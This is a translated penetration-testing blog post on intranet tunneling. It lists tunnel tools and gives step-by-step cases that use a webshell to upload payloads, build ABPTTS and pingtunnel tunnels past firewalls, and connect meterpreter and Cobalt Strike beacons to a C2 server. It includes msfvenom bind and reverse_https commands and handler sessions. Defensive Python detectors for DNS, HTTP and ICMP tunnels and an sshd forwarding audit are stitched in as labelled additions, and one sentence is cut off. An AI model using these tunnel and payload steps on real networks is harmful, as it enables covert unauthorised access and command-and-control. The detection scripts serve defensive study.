Penetration Testing Intranet Penetration (2): Intranet Penetration

1. Introduction

There are many articles about intranet penetration on the Internet, but most of them focus on tool usage and rarely explain the principles. This article starts from the principle of intranet penetration and designs the corresponding scheme flexibly according to the outbound and inbound connectivity of the intranet host.

Intranet Penetration Basics

2. The principle of intranet penetration

Intranet penetration means using tunneling techniques, carried over protocols the network firewall permits, to bypass the firewall's blocking and reach the otherwise unreachable target network.

What is tunneling? The encyclopedia entry explains it as follows:

Tunneling is a method of passing data between networks by using the infrastructure of the internetwork. The data (or payload) transmitted through the tunnel may be data frames or packets of a different protocol. The tunneling protocol re-encapsulates these frames or packets in new packet headers and sends them. The new header provides routing information so that the encapsulated payload can be carried across the Internet. The encapsulated packets are routed through the public internetwork between the two endpoints of the tunnel, and the logical path they take is called the tunnel. Once the packets reach the tunnel endpoint, the data is unpacked and forwarded to its final destination. Note that tunneling refers to the whole process of encapsulation, transmission and unpacking.

The tunneling technologies commonly used for intranet penetration include DNS, HTTP, SSH and ICMP tunneling, i.e. protocols that network firewalls readily allow.

These tunneling technologies can be classified by the protocol layer they operate at.

  • network layer tunnel

    ICMP tunneling, etc.

  • transport layer tunnel

    TCP tunnel, UDP tunnel

  • application layer tunnel

    HTTP, DNS, SSH and other tunnels

All possible outbound access methods of intranet hosts

  • Allow the ICMP protocol to go out of the network

The network firewall allows ICMP out of the network, i.e. the host can ping external hosts; this is commonly permitted.

  • Allow specific TCP or UDP protocol ports to go out of the network

The network firewall allows specific TCP or UDP ports out of the network, typically the default listening ports of common services on external hosts, such as 22, 53, 80, 443 and 3389. In a network environment that appears to have no outbound access, probing all TCP and UDP ports usually turns up one or two common ports that are allowed out. This is usually the result of misconfiguration or laziness on the part of the network administrator. For example, the configured firewall rules may be inconsistent and rule evaluation stops at the first matching rule; or the administrator configures port 3306 so that the web server can reach the MySQL database in another subnet but, being lazy, simply allows the web server to reach port 3306 of any IP address.

  • Allow specific application layer protocols to go out of the network (such as HTTP, SSH, DNS and other application layer protocols)

This kind of network firewall identifies application-layer protocols and releases those allowed out of the network, such as HTTP, SSH, DNS and RDP; office networks usually allow HTTP out, and a domain-name whitelist may restrict the

All possible inbound access methods of intranet hosts

  • Allow ICMP protocol to access the network

The target host can be pinged.

  • Allow specific TCP or UDP protocol ports to enter the network

A NAT port mapping maps a port on the public IP to the service port of an intranet host, for example exposing web and MySQL services to the public network.

  • Allow specific application layer protocols to access the network

This kind of network firewall identifies application-layer protocols and admits those allowed into the network, for example an HTTP reverse proxy that proxies HTTP traffic received from the public network to the intranet host. Mainstream inbound setups usually add a WAF layer to inspect the traffic.

3. Common tools for intranet penetration

3.1. Network Layer Tunnel Tool

  • icmpsh

Spawns a cmd shell over ICMP; single-purpose, and the returned shell is extremely unstable; not recommended.

  • icmptunnel

Creates a virtual network interface and carries its traffic over ICMP, i.e. a VPN over an ICMP tunnel. Requires root privileges and is very noisy; not recommended.

  • pingtunnel

TCP, UDP and SOCKS5 over ICMP; fast, stable, cross-platform, and client mode works without administrator privileges; recommended.

3.2. Transport Layer Tunneling Tool

  • netcat

The Swiss Army knife of network tools; needs no introduction, and Linux systems generally ship with it.

  • powercat

    netcat for powershell

  • shocked

Can record the forwarded traffic, which makes it convenient to inspect the forwarded content; needs to be installed separately.

  • netsh

The network configuration tool that ships with Windows.

  • lcx

Port forwarding tool.

  • NATBypass

A Go implementation of lcx; better cross-platform support and better documentation.

  • joke

Port forwarding and intranet proxy tool, similar in function to lcx/ew, with simplified command-line parameters, UDP forwarding support and better cross-platform support. Disadvantage: it cannot listen on a specified IP and listens on 0.0.0.0:port by default, which increases exposure.

3.3. Application Layer Tunneling Tool

Since there are many application-layer protocols, there are also many corresponding tunneling tools. The protocols we most often tunnel over are DNS, HTTP, SSH and SOCKS.
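The DNS tunnels built by tools such as dnscat2, dns2tcp and iodine have to push their data through query names and through record types like TXT and NULL, which is what a resolver log shows. The following Python is an added example, not from the original post or from any of those tools: it scores query logs per registered domain on label length, label entropy, the share of unique subdomains and the share of tunnel-friendly record types. The log lines are constructed, the "last two labels" rule for the registered domain is a simplification, and the thresholds are assumptions to be tuned against real traffic.

```python
import math
from collections import defaultdict

# Constructed sample of resolver query logs: "client qname qtype" (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com MX
10.0.0.5 www.example.com A
10.0.0.5 cdn.example.com AAAA
10.0.0.5 www.example.com A
10.0.0.7 4a9f3c1e8b2d7a6c.t.tunnel-demo.test TXT
10.0.0.7 9e2b7d4f1a8c3e5b0d6f.t.tunnel-demo.test TXT
10.0.0.7 c31f8e7a2d9b4c6e5a0f.t.tunnel-demo.test TXT
10.0.0.7 0d7e5c2a9b1f4e8c3a6d.t.tunnel-demo.test NULL
10.0.0.7 b8a1e4d7c2f9a3e6b5c0.t.tunnel-demo.test TXT
10.0.0.7 6f2c9a4e1d8b7c3a5e0f.t.tunnel-demo.test TXT
"""

# Record types that carry the most payload per query and that DNS tunnels lean on.
TUNNEL_QTYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded tunnel data scores high, hostnames low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Parse 'client qname qtype' lines into (client, qname, qtype) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines instead of failing the whole run
        client, qname, qtype = parts
        records.append((client, qname.lower().rstrip("."), qtype.upper()))
    return records


def split_name(qname):
    """Assumption: registered domain = last two labels (no public-suffix list here)."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return qname, ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def score_domains(records, min_queries=5):
    """Aggregate per registered domain and flag domains with >= 3 tunnel indicators."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "label_len": [], "entropy": [], "tunnel_types": 0})
    for _client, qname, qtype in records:
        domain, sub = split_name(qname)
        st = stats[domain]
        st["queries"] += 1
        st["subdomains"].add(sub)
        first = sub.split(".")[0] if sub else ""  # leftmost label carries the data
        st["label_len"].append(len(first))
        st["entropy"].append(shannon_entropy(first))
        if qtype in TUNNEL_QTYPES:
            st["tunnel_types"] += 1

    results = {}
    for domain, st in stats.items():
        n = st["queries"]
        if n < min_queries:
            continue  # too little data to judge
        unique_ratio = len(st["subdomains"]) / n
        avg_len = sum(st["label_len"]) / n
        avg_ent = sum(st["entropy"]) / n
        tunnel_frac = st["tunnel_types"] / n
        indicators = []
        if unique_ratio >= 0.8:
            indicators.append("high unique-subdomain ratio")
        if avg_len >= 16:
            indicators.append("long leading labels")
        if avg_ent >= 3.0:
            indicators.append("high label entropy")
        if tunnel_frac >= 0.5:
            indicators.append("TXT/NULL/CNAME/MX heavy")
        results[domain] = {
            "queries": n,
            "unique_ratio": round(unique_ratio, 2),
            "avg_label_len": round(avg_len, 1),
            "avg_entropy": round(avg_ent, 2),
            "tunnel_type_fraction": round(tunnel_frac, 2),
            "indicators": indicators,
            "suspicious": len(indicators) >= 3,
        }
    return results


if __name__ == "__main__":
    for domain, info in score_domains(parse_log(SAMPLE_LOG)).items():
        print(domain, info)
```

Run against real resolver or Passive DNS exports the same four features hold up, but legitimate CDNs and anti-spam services also generate many unique, long subdomains, so the per-domain score is a triage signal rather than a verdict.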

  • dnscat2

Creates not only a DNS tunnel but also a C2 channel.

  • dnscat2-powershell

    Powershell client for dnscat2

  • dns2tcp

TCP over DNS, i.e. forwarding TCP connections through a DNS tunnel.

  • iodine

IPv4 over DNS, i.e. forwarding IPv4 packets through a DNS tunnel.

  • reGeorg

SOCKS over HTTP, i.e. forwarding SOCKS through an HTTP tunnel.

  • Neo-reGeorg

A refactored version of reGeorg: improved stability and usability, avoids signature detection, and is actively updated.

  • reDuh

TCP over HTTP, i.e. forwarding TCP connections through an HTTP tunnel; the tunnel is unstable.

  • Tunna

    TCP and SOCKS over HTTP, i.e. forwarding TCP connections and SOCKS through an HTTP tunnel; the tunnel is unstable.

  • ABPTTS

TCP over HTTP, i.e. forwarding TCP connections through an HTTP tunnel. The data is encrypted, the HTTP traffic can be customized, evasion of signature detection is very good, and the created tunnel is very stable. Unfortunately only aspx and jsp server-side scripts are supported.

  • EarthWorm

A very convenient multi-level SOCKS proxy; no longer updated.

  • Termite

The upgraded version of EarthWorm; no longer updated.

  • Venom

    Venom is a multi-level proxy tool developed in Go designed for penetration testers.

  • ssocks

Forward and reverse SOCKS tool with a small executable.

  • s5.go

A SOCKS service tool written in Go, with good cross-platform support.

  • ssh
    (In the commands below, user is a placeholder for the login name, which the original page obscured; 192.168.1.1 is the ssh server.)
    Local forwarding:
    ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 user@192.168.1.1
    # The ssh client listens on 127.0.0.1:7777 and sends the TCP connections it receives through the ssh tunnel to 192.168.1.1; the ssh server then forwards them to 114.114.114.114:9999
    Remote forwarding:
    ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 user@192.168.1.1
    # The ssh server listens on 127.0.0.1:7777 and sends the TCP connections it receives back through the ssh tunnel to the ssh client, which forwards them to 114.114.114.114:9999
    Dynamic forwarding:
    ssh -CNfg -D 127.0.0.1:7777 user@192.168.1.1
    # The ssh client listens on 127.0.0.1:7777 as a SOCKS service and sends the SOCKS requests it receives through the ssh tunnel to the ssh server, which forwards them to the requested destination
    Common parameters for building an ssh tunnel:
    -C compress transferred data to improve throughput
    -f run the data transfer in the background
    -N silent connection, i.e. no remote command is executed
    -g allow remote hosts to connect to the local forwarded port
    -L local port forwarding
    -R remote port forwarding
    -D dynamic forwarding, i.e. a SOCKS proxy
    -p specify the ssh connection port
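Whether -L, -R and -D work at all is decided by the ssh server's configuration, which is the lever a defender has. The following Python is an added example, not from the original post or from OpenSSH: it parses the global section of an sshd_config and reports the directives that govern forwarding (AllowTcpForwarding for -L/-R/-D, GatewayPorts for -R with -g, PermitTunnel for tun-device tunnels, PermitOpen for the permitted forward targets), applying the OpenSSH defaults when a directive is absent. Both config excerpts are constructed; the hardened one restricts forwarding to one group through a Match block, whose contents are only counted, not evaluated.

```python
import re

# OpenSSH defaults used when a directive is absent (from sshd_config(5)).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
}

# Constructed sshd_config excerpt with every forwarding control wide open.
WEAK_CONFIG = """\
# sshd_config (constructed sample, permissive)
Port 22
PermitRootLogin no
AllowTcpForwarding yes
GatewayPorts yes
PermitTunnel yes
"""

# Constructed hardened counterpart: forwarding off globally, local forwards to a
# single database host allowed only for members of one group.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
PermitOpen none
Match Group tunnel-ops
    AllowTcpForwarding local
    PermitOpen 10.20.0.15:5432
"""


def parse_sshd_config(text):
    """Return (global_directives, match_blocks); keys are lowercased.
    sshd keeps the first value it sees for a directive, so later duplicates are ignored."""
    global_directives, match_blocks = {}, []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)  # "Key value" or "Key=value"
        key, value = (parts + [""])[:2]
        key = key.lower()
        if key == "match":
            current = {"criteria": value, "directives": {}}
            match_blocks.append(current)
        elif current is not None:
            current["directives"].setdefault(key, value)
        else:
            global_directives.setdefault(key, value)
    return global_directives, match_blocks


def audit_forwarding(text):
    """Report forwarding-related directives whose effective global value is permissive."""
    global_directives, match_blocks = parse_sshd_config(text)
    effective = {k: global_directives.get(k, d).lower() for k, d in DEFAULTS.items()}
    findings = []
    if effective["allowtcpforwarding"] != "no":
        findings.append(("AllowTcpForwarding", effective["allowtcpforwarding"],
                         "ssh -L/-R/-D port forwarding is available to every user"))
    if effective["gatewayports"] != "no":
        findings.append(("GatewayPorts", effective["gatewayports"],
                         "remote forwards (-R) may bind on all interfaces, exposing them to the network"))
    if effective["permittunnel"] != "no":
        findings.append(("PermitTunnel", effective["permittunnel"],
                         "layer-3 tun device tunnels (ssh -w) are allowed"))
    if effective["allowtcpforwarding"] != "no" and effective["permitopen"] == "any":
        findings.append(("PermitOpen", effective["permitopen"],
                         "local forwards may target any host:port reachable from the server"))
    return {"effective": effective, "findings": findings,
            "match_blocks": len(match_blocks)}


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        report = audit_forwarding(cfg)
        print(name, report["effective"], f"(Match blocks not evaluated: {report['match_blocks']})")
        for directive, value, meaning in report["findings"]:
            print(f"  {directive} {value}: {meaning}")
```

On a real host, run the audit over the output of `sshd -T`, which prints the fully resolved configuration, rather than over the raw file, so that include files and defaults are already applied.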

4. Intranet penetration cases in practice

4.1. Bringing an intranet host with no outbound access online

Background: the host on which we obtained a webshell is on the intranet. Network-layer protocols such as ICMP cannot leave the network, nor can transport-layer protocols such as TCP and UDP, nor application-layer protocols such as DNS and HTTP. The only data channel is the web application behind a reverse proxy.

Design

Use the HTTP connection to the reverse-proxied web application to build a forward TCP over HTTP tunnel. Through this tunnel we can initiate a TCP connection to the intranet host. Generate a bind-type payload, upload and execute it through the webshell; it listens on a port, and the C2 platform connects to that port through the tunnel to bring the host online.

Tools that can build TCP over HTTP tunnels include ABPTTS, Tunna and reDuh. Since the TCP connections built by Tunna and reDuh are unstable, ABPTTS is chosen here.
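ABPTTS, Tunna and reDuh all move TCP by having a client POST repeatedly to one server-side script, and that rhythm is visible in the web server's access log even when the script name and HTTP body are customized. The following Python is an added example, not from the original post or from any of those tools: it parses constructed combined-format log lines and groups requests by client and path, flagging endpoints that receive machine-speed, almost exclusively POST, Referer-less requests with highly variable response sizes. The log, the script path and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def build_sample_log():
    """Constructed log: one client browsing normally, one client driving a tunnel script."""
    base = datetime(2020, 4, 27, 4, 50, 0)
    ts = lambda t: t.strftime("%d/%b/%Y:%H:%M:%S -0400")
    lines = []
    browsing = [  # (method, path, response size, referer)
        ("GET", "/", 2048, "-"),
        ("GET", "/static/app.css", 812, "http://web.test/"),
        ("GET", "/login.aspx", 3120, "http://web.test/"),
        ("POST", "/login.aspx", 188, "http://web.test/login.aspx"),
        ("GET", "/home.aspx", 4410, "http://web.test/login.aspx"),
    ]
    for i, (method, path, size, ref) in enumerate(browsing):
        lines.append(f'10.0.0.5 - - [{ts(base + timedelta(seconds=15 * i))}] '
                     f'"{method} {path} HTTP/1.1" 200 {size} "{ref}" "Mozilla/5.0"')
    for i in range(40):  # tunnel polling: 40 POSTs in ~16 s, sizes vary with the payload
        size = 64 + (i * 37) % 900
        lines.append(f'198.51.100.7 - - [{ts(base + timedelta(milliseconds=400 * i))}] '
                     f'"POST /uploads/page.aspx HTTP/1.1" 200 {size} "-" "Mozilla/5.0"')
    return "\n".join(lines)


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
        d["size"] = 0 if d["size"] == "-" else int(d["size"])
        records.append(d)
    return records


def find_tunnel_endpoints(records, min_requests=20, max_avg_interval=2.0):
    """Score each (client, path) pair; three or more indicators mark it suspicious."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], r["path"])].append(r)
    report = {}
    for (client, path), rs in groups.items():
        n = len(rs)
        if n < min_requests:
            continue
        rs.sort(key=lambda r: r["ts"])
        post_frac = sum(r["method"] == "POST" for r in rs) / n
        no_ref_frac = sum(r["referer"] in ("", "-") for r in rs) / n
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rs, rs[1:])]
        avg_gap = sum(gaps) / len(gaps)
        distinct_sizes = len({r["size"] for r in rs})
        indicators = []
        if post_frac >= 0.9:
            indicators.append("almost all POST")
        if no_ref_frac >= 0.9:
            indicators.append("no Referer")
        if avg_gap <= max_avg_interval:
            indicators.append("machine-speed polling")
        if distinct_sizes / n >= 0.5:
            indicators.append("highly variable response sizes")
        report[f"{client} {path}"] = {
            "requests": n,
            "post_fraction": round(post_frac, 2),
            "avg_interval_s": round(avg_gap, 2),
            "indicators": indicators,
            "suspicious": len(indicators) >= 3,
        }
    return report


if __name__ == "__main__":
    for endpoint, info in find_tunnel_endpoints(parse_log(build_sample_log())).items():
        print(endpoint, info)
```

The same grouping applied to a reverse proxy's or WAF's log is the natural place to run this, since the case above assumes that proxy is the only path into the host; a recently created script path that suddenly becomes the busiest POST target on the site deserves a look at the file itself.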

4.1.1. Bringing metasploit online

1. Build a TCP connection through a forward HTTP tunnel

# Set up the abptts runtime environment
# Note: installing the pycrypto library on Windows first requires the dependency from http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto

# Generate the server-side script
python abpttsfactory.py -o server

# Upload the server-side script to the web server, then run the following on the client
python abpttsclient.py -c server/config.txt -u "http://192.168.168.10/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888

# The abptts client listens on 127.0.0.1:7777 and, through the HTTP tunnel at http://192.168.168.10/abptts.aspx, forwards TCP connections made to 127.0.0.1:7777 on to 127.0.0.1:8888 in the web server's network

2. Generate a bind-type payload, upload and execute it through the webshell

# rhost and lport here are the forwarding destination IP and port
msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=8888 -f exe -o meterpreter.exe

3. Start the msf handler and wait for meterpreter to come online

# rhost and lport here are the IP and port the abptts client listens on; the msf host must be able to reach them. Here msf and abptts run on the same host

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 127.0.0.1:7777
[*] Sending stage (180291 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400

meterpreter > getuid
Server username: DESKTOP-0AH7FQ0\admin

4.1.2. Bringing cobaltstrike online

Since cobaltstrike's bind-type listeners are only Beacon TCP and Beacon SMB, and both must connect through a parent beacon rather than directly to the cobaltstrike server, we need a parent beacon to relay the connection.

1. Build a TCP connection through a forward HTTP tunnel

# Set up the abptts runtime environment
# Note: installing the pycrypto library on Windows first requires the dependency from http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto

# Generate the server-side script
python abpttsfactory.py -o server

# Upload the server-side script to the web server, then run the following on the client
python abpttsclient.py -c server/config.txt -u "http://192.168.168.121/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888

# The abptts client listens on 127.0.0.1:7777 and, through the HTTP tunnel at http://192.168.168.121/abptts.aspx, forwards TCP connections made to 127.0.0.1:7777 on to 127.0.0.1:8888 in the web server's network

2. Create a reverse listener

3. Generate a parent beacon

4. Upload the parent beacon to the host running the abptts client and execute it

5. Create a listener whose payload is tcp beacon

6. Generate a stageless child beacon

7. Upload and execute the generated child beacon through webshell

# Check listening sockets through the webshell to confirm the child beacon started successfully
netstat -ano | findstr 127.0.0.1:8888

8. In the parent beacon, connect to the IP and port the abptts client listens on

9. The webshell host without outbound access is now online

4.2. Bringing intranet hosts online that can only reach out via ICMP

Background: we obtained a shell on an intranet host through some channel, but that channel is unsuitable as a C2 communication channel (for example, a site with separate web and database servers, where we obtained a shell on the database server through SQL injection). Transport-layer protocols such as TCP and UDP and application-layer protocols such as DNS and HTTP cannot leave the network; only ICMP can.

Design

Since ICMP can leave the network, it can be used to build a reverse TCP over ICMP or SOCKS over ICMP tunnel to bring the host online to the C2 platform. The tunnel tool used is pingtunnel, which forwards TCP, UDP and SOCKS5 connections through ICMP tunnels.
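A tunnel like the one designed above carries TCP or SOCKS data inside ICMP echo payloads, so the defender's counterpart is to look at those payloads instead of just counting pings. The following Python is an added example, not from the original post or from pingtunnel: it groups echo requests by source and destination and flags flows whose payloads are not a stock ping fill, are oversized, or change on every request. The Windows 32-byte alphabet fill is the real stock pattern; the Linux-style sample (8 timestamp bytes plus an incrementing fill) is a constructed approximation of the iputils pattern; the packet summaries and thresholds are constructed assumptions.

```python
import hashlib
from collections import defaultdict

# Fill pattern that Windows ping puts in every echo request (32 bytes).
WINDOWS_PING_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"


def is_standard_ping_payload(payload: bytes) -> bool:
    """True if the echo payload looks like a stock ping fill: either the fixed
    Windows alphabet, or an 8-byte timestamp followed by a byte pattern that
    increments by one (iputils style)."""
    if payload == WINDOWS_PING_FILL:
        return True
    body = payload[8:]
    return len(body) >= 16 and all(
        body[i + 1] == (body[i] + 1) & 0xFF for i in range(len(body) - 1)
    )


def make_linux_ping(seq: int) -> bytes:
    """Constructed approximation of a Linux echo payload: 8 timestamp bytes plus
    an incrementing fill, 56 bytes in total."""
    return seq.to_bytes(8, "big") + bytes(range(0x10, 0x40))


def make_tunnel_payload(i: int, size: int = 1024) -> bytes:
    """Constructed stand-in for tunnelled TCP data: deterministic pseudo-random bytes."""
    out = b""
    n = 0
    while len(out) < size:
        out += hashlib.sha256(b"tunnel-%d-%d" % (i, n)).digest()
        n += 1
    return out[:size]


# Constructed echo-request summaries (src, dst, payload): two hosts pinging normally
# and one host pushing tunnel-like traffic. Addresses are from documentation ranges.
SAMPLE_ECHO_REQUESTS = (
    [("10.0.0.5", "198.51.100.1", make_linux_ping(s)) for s in range(1, 5)]
    + [("10.0.0.6", "198.51.100.1", WINDOWS_PING_FILL) for _ in range(4)]
    + [("10.0.0.9", "203.0.113.10", make_tunnel_payload(i)) for i in range(40)]
)


def analyse_icmp_flows(requests, min_requests=10, max_avg_len=128):
    """Group echo requests by (src, dst); two or more indicators mark a flow suspicious."""
    flows = defaultdict(list)
    for src, dst, payload in requests:
        flows[(src, dst)].append(payload)
    report = {}
    for (src, dst), payloads in flows.items():
        n = len(payloads)
        standard = sum(1 for p in payloads if is_standard_ping_payload(p))
        avg_len = sum(len(p) for p in payloads) / n
        distinct_bodies = len({p[8:] for p in payloads})  # ignore the timestamp bytes
        indicators = []
        if n >= min_requests and standard / n < 0.5:
            indicators.append("most payloads are not a stock ping fill")
        if avg_len > max_avg_len:
            indicators.append("oversized payloads")
        if n >= min_requests and distinct_bodies / n > 0.9:
            indicators.append("payload body changes on every request")
        report[f"{src}->{dst}"] = {
            "requests": n,
            "standard_fraction": round(standard / n, 2),
            "avg_len": round(avg_len, 1),
            "indicators": indicators,
            "suspicious": len(indicators) >= 2,
        }
    return report


if __name__ == "__main__":
    for flow, info in analyse_icmp_flows(SAMPLE_ECHO_REQUESTS).items():
        print(flow, info)
```

The payload check is the part that generalizes: even a tunnel that pads every packet to 56 bytes cannot reproduce a fixed fill and still carry data, so the "not a stock fill" and "body changes every request" indicators survive size-matching, while the size indicator alone does not.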

4.2.1. ICMP tunnel forwarding TCP: bringing metasploit online

1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. On the ICMP tunnel client (the host that needs to come online through the ICMP tunnel), run the following command to create the reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# The icmp client listens on 127.0.0.1:9999 and forwards the TCP traffic it receives there, through the ICMP tunnel to icmpserver_ip, on to c2_server_ip:7777

3. Generate a reverse-payload meterpreter, upload it to the ICMP tunnel client and execute it to come online

msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=9999 -f exe -o meterpreter.exe
# lhost and lport here are the IP and port the icmp client listens on

4. Start the msf handler and wait for meterpreter to come online

# lhost and lport here are the IP and port the icmp client forwards to

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:7777

meterpreter > getuid
Server username: DESKTOP-test0\admin

4.2.2. ICMP tunnel forwarding SOCKS: bringing metasploit online

1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. On the ICMP tunnel client (the host that needs to come online through the ICMP tunnel), run the following command to create the reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# The icmp tunnel client listens on 127.0.0.1:6688 as a SOCKS5 service; requests go through the ICMP tunnel to icmpserver_ip, and icmpserver forwards the proxied connections to their destination

3. Generate a reverse-payload meterpreter that supports a SOCKS5 proxy, upload it to the ICMP tunnel client and execute it to come online

msfvenom -p windows/meterpreter/reverse_https LHOST=c2_server_ip LPORT=8443 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6688 -f exe -o meterpreter.exe

4. Start the msf handler and wait for meterpreter to come online

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 8443
lport => 8443
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8443

meterpreter > getuid
Server username: DESKTOP-test0\admin

4.2.3. ICMP tunnel forwarding TCP: bringing cobaltstrike online

1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. On the ICMP tunnel client (the host that needs to come online through the ICMP tunnel), run the following command to create the reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# The icmp tunnel client listens on 127.0.0.1:9999 and forwards the TCP traffic it receives there, through the ICMP tunnel to icmpserver_ip, on to c2_server_ip:7777

3. cobaltstrike creates a listener

# HTTPS Host and HTTPS Port (C2) are the IP and port the ICMP tunnel client listens on
# HTTPS Port (Bind) is the port of the forwarding destination

4. Generate a beacon with a reverse payload

5. Upload the generated beacon to the ICMP tunnel client and execute it; it comes online through the reverse ICMP tunnel

4.2.4. ICMP tunnel forwarding SOCKS: bringing cobaltstrike online

1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. On the ICMP tunnel client (the host that needs to come online through the ICMP tunnel), run the following command to create the reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# The icmp tunnel client listens on 127.0.0.1:6688 as a SOCKS5 service; requests go through the ICMP tunnel to icmpserver_ip, and icmpserver forwards the proxied connections to their destination

3. cobaltstrike creates a listener

# The proxy here can be SOCKS or HTTP
# cobaltstrike does not seem to support SOCKS5 proxies, so this does not come online successfully
# An HTTP proxy can also be used here, but a tool such as privoxy is needed to convert the HTTP proxy into a SOCKS5 proxy

4. Select the created listener, generate a beacon, upload it to the target and execute it to come online

5. Summary

The essence of intranet penetration is nothing more than forwarding transport-layer TCP/UDP packets through various communication channels, whether forward or reverse; application-layer protocols are built on top of the transport layer. For example, ABPTTS + a SOCKS service = reGeorg.

The precondition for intranet penetration is remote code execution through some communication channel. If remote code execution is possible through a channel, then TCP/UDP packet forwarding, i.e. a TCP/UDP over something tunnel, can be realized through that channel. If no ready-made tool exists, we may need to develop one ourselves. For example, if the shell was obtained through SQL injection, that channel can also be used to forward TCP/UDP packets; there is no ready-made tool, so one has to be written: the tunnel client encapsulates the TCP/UDP packets into the database, and the tunnel server reads the encapsulated packets from the database, unpacks them and sends them to the corresponding address.

6. Zero-basics introduction to penetration testing

For readers who have never been exposed to network security or penetration testing, I have prepared a detailed learning and growth roadmap. It is arguably the most scientific and systematic learning route, and following this general direction will work for everyone.

Origin blog.csdn.net/m0_74131821/article/details/130322657